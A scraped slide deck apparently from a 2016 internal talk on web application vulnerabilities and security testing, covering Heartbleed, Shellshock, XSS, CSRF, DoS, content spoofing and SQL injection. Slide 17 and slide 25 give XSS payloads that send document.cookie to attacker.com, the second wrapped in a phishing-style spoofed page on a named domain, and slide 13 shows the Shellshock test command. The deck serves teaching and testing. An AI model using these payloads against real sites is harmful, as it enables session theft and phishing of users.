Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Security_Testing_Presentation

303 views

Published on

  • Be the first to comment

  • Be the first to like this

Security_Testing_Presentation

  1. 1. ©2012 Trimble Navigation Limited©2012 Trimble Navigation Limited Web Application Vulnerabilities & Security Testing 18 Jul 2016 ~ Rajil
  2. 2. ©2012 Trimble Navigation Limited Objective The primary objective is to give a brief introduction of critical & potential vulnerabilities in a web application. Over view of security testing techniques to detect for underlying vulnerabilities or security holes in a web applications. Web Application Vulnerabilities & Security Testing
  3. 3. ©2012 Trimble Navigation Limited We do security testing for  Confidentiality  Privileges Escalation.  Data Integrity Web Application Vulnerabilities & Security Testing
  4. 4. ©2012 Trimble Navigation Limited Tools Used  Nmap  Zed Attack Proxy (ZAP)  Metasploit Web Application Vulnerabilities & Security Testing
  5. 5. ©2012 Trimble Navigation Limited Demo Systems  CentOS Machine  Windows 2008 Server  Kali Linux (Attacker) Web Application Vulnerabilities & Security Testing
  6. 6. ©2012 Trimble Navigation Limited  Heart bleed  Shell Shock  Cross Site Scripting (XSS)  Cross Site Request Forgery (CSRF)  SQL Injection & Error Messages  DoS & Buffer Overflow  Content Spoofing Web Application Vulnerabilities & Security Testing
  7. 7. ©2012 Trimble Navigation Limited Heart bleed Heart bleed is a security bug in openSSL cryptography library, which is widely used to implement Transport Security Layer Protocol heartbeat functionality; this is because of improper input validation for boundary check. The vulnerability is classified as a buffer over-read, a situation where more data can be read than should be allowed. The bug name has been derived from "Heartbeat". It was publicly disclosed in April 2014. Web Application Vulnerabilities & Security Testing
  8. 8. ©2012 Trimble Navigation Limited Heart Bleed Web Application Vulnerabilities & Security Testing
  9. 9. ©2012 Trimble Navigation Limited Heart Bleed OpenSSL 1.0.1 through 1.0.1f are vulnerable.  OpenSSL 1.0.1g was released to address this vulnerability  List of vulnerable websites https://zmap.io/heartbleed/ http://www.tjkelly.com/blog/heartbleed-website-list/  To test online https://sslanalyzer.comodoca.com/heartbleed.html https://filippo.io/Heartbleed/ Web Application Vulnerabilities & Security Testing
  10. 10. ©2012 Trimble Navigation Limited Heart Bleed Leaked data from vulnerable website Web Application Vulnerabilities & Security Testing
  11. 11. ©2012 Trimble Navigation Limited Shellshock Shell shock is also known as Bash Door, it was disclosed on 24th Sept 2014. Any webserver running on vulnerable Linux or UNIX machines will allow the attacker to execute arbitrary shell commands on the target machine. Windows OS is not vulnerable to this. Web Application Vulnerabilities & Security Testing
  12. 12. ©2012 Trimble Navigation Limited Shellshock Web Application Vulnerabilities & Security Testing
  13. 13. ©2012 Trimble Navigation Limited Shellshock To test if the system is vulnerable, issue the below command in Unix or Linux machines. env x='() { :;}; echo vulnerable' bash -c 'echo hello' Web Application Vulnerabilities & Security Testing
  14. 14. ©2012 Trimble Navigation Limited Cross Site Scripting (XSS) This is a hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim. XSS enables the attackers to inject client-side script into Web pages viewed by other users. XSS allows attackers to execute script in the victim’s browser which can hijack user sessions, or redirect the user to malicious sites. XSS leads to session hijacking. There two types of XSS. Stored XSS Reflected XSS Web Application Vulnerabilities & Security Testing
  15. 15. ©2012 Trimble Navigation Limited Cross Site Scripting (XSS) <script>alert(‘hello’)</script> Web Application Vulnerabilities & Security Testing
  16. 16. ©2012 Trimble Navigation Limited Cross Site Scripting (XSS) Web Application Vulnerabilities & Security Testing
  17. 17. ©2012 Trimble Navigation Limited Cross Site Scripting (XSS) Cookie Stealing: <script>document.location='http://attacker.com/tinylogger.php?cooki e='.concat(escape(document.cookie));</script> Web Application Vulnerabilities & Security Testing
  18. 18. ©2012 Trimble Navigation Limited Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests; the vulnerable application thinks these requests are legitimate. Web Application Vulnerabilities & Security Testing
  19. 19. ©2012 Trimble Navigation Limited Cross Site Request Forgery (CSRF)  Attacker will send a malicious link to the victim by some means like social websites, chat or email. This link may seems very interesting to the victim.  Once the victim clicked this link, then without his knowledge, browser sends forged requests to the server to perform some action. Web Application Vulnerabilities & Security Testing
  20. 20. ©2012 Trimble Navigation Limited Denial Of Service Attacks (DoS or DDoS)  This attack is an attempt to make a machine or network resource unavailable to its intended users.  One common method of attack involves saturating the target machine with external communications requests, such that it cannot respond to legitimate traffic, or responds so slowly.  This attack consumes the target computer all resources so that it can no longer provide its intended service.  A distributed denial-of-service (DDoS) is where the attack source is more than one, often thousands of, unique IP addresses. Web Application Vulnerabilities & Security Testing
  21. 21. ©2012 Trimble Navigation Limited Denial Of Service Attacks (DoS or DDoS) Types of DoS Attacks  ICMP flood  SYN flood  Ping flood (Ping of Death)  Peer-to-peer attacks  Application Level Floods Web Application Vulnerabilities & Security Testing
  22. 22. ©2012 Trimble Navigation Limited Denial Of Service Attacks (DoS or DDoS) Application Level DoS Attack Some of DoS attacks rely on software related exploits such as buffer overflows. These attacks Cause the application to fill the disk space or consume all available memory or CPU cycles. Buffer overflow While a program writing data in to a buffer, over runs buffer’s boundary and overwrites the adjacent memory locations. This may result in erratic program behavior, including memory access errors, incorrect results, or a crash. Web Application Vulnerabilities & Security Testing
  23. 23. ©2012 Trimble Navigation Limited Content Spoofing Content spoofing, also referred to as content injection or virtual defacement, is an attack targeting a user made possible by injection vulnerability in a web application. When an application does not properly handle user supplied data, an attacker can supply content to a web application, typically via a parameter value, that is reflected back to the user. This presents the user with a modified page under the context of the trusted domain. This attack is typically used as in conjunction with phishing attacks. Web Application Vulnerabilities & Security Testing
  24. 24. ©2012 Trimble Navigation Limited Content Spoofing Sample Phishing email Web Application Vulnerabilities & Security Testing
  25. 25. ©2012 Trimble Navigation Limited Content Spoofing Once the victim clicked on the malicious links from that email, it will display the spoofed content in the vulnerable application. Payload https://eugmrel.road.com/apps/apm/jspServer/PasswordAlert.jsp?msg=<H1><b>Some malicious activity detected on your acount, kindly <a href="https://eugmrel.road.com/apps/apm/jspServer/PasswordAlert.jsp?msg=<script>doc ument.location='http://attacker.com/tinylogger1.php?cookie='.concat(escape(document.co okie));</script>">Click Here</a> to change the password immediately !!!</b></h1> Web Application Vulnerabilities & Security Testing
  26. 26. ©2012 Trimble Navigation Limited SQL Injection SQL injection is a technique where malicious users can inject SQL commands into an SQL statement, via web page input. Injected SQL commands can alter SQL statement and compromise the security of a web application. Web Application Vulnerabilities & Security Testing
  27. 27. ©2012 Trimble Navigation Limited SQL Injection Web Application Vulnerabilities & Security Testing
  28. 28. ©2012 Trimble Navigation Limited SQL Injection Web Application Vulnerabilities & Security Testing
  29. 29. ©2012 Trimble Navigation Limited Error Messages Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function. Error Message 1: java.sql.SQLSyntaxErrorException: ORA-00942: Table or View doesn’t exist at oracle.jdbc.driver.SQLStateMapping.newSQLException(SQLStateMapping.java:91) at oracle.jdbc.driver.DatabaseError.newSQLException(DatabaseError.java:112) at oracle.jdbc.driver.DatabaseError.throwSqlException(DatabaseError.java:173) at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:455) at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:413) at oracle.jdbc.driver.T4C8Oall.receive(T4C8Oall.java:1030) at oracle.jdbc.driver.T4CPreparedStatement.doOall8(T4CPreparedStatement.java:194) at oracle.jdbc.driver.T4CPreparedStatement.executeForDescribe(T4CPreparedStatement.java:785) at oracle.jdbc.driver.T4CPreparedStatement.executeMaybeDescribe(T4CPreparedStatement.java:860) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:1186) Web Application Vulnerabilities & Security Testing
  30. 30. ©2012 Trimble Navigation Limited Error Messages Error Message 2: java.sql.SQLException: ORA-12899: value too large for column "ROVER"."DRIVER"."DESCRIPTION" (actual: 183, maximum: 80) at oracle.jdbc.driver.SQLStateMapping.newSQLException(SQLStateMapping.java:70) at oracle.jdbc.driver.DatabaseError.newSQLException(DatabaseError.java:112) at oracle.jdbc.driver.DatabaseError.throwSqlException(DatabaseError.java:173) at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:455) at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:413) at oracle.jdbc.driver.T4C8Oall.receive(T4C8Oall.java:1030) at oracle.jdbc.driver.T4CPreparedStatement.doOall8(T4CPreparedStatement.java:194) Web Application Vulnerabilities & Security Testing
  31. 31. ©2012 Trimble Navigation Limited Thank You Web Application Vulnerabilities & Security Testing

×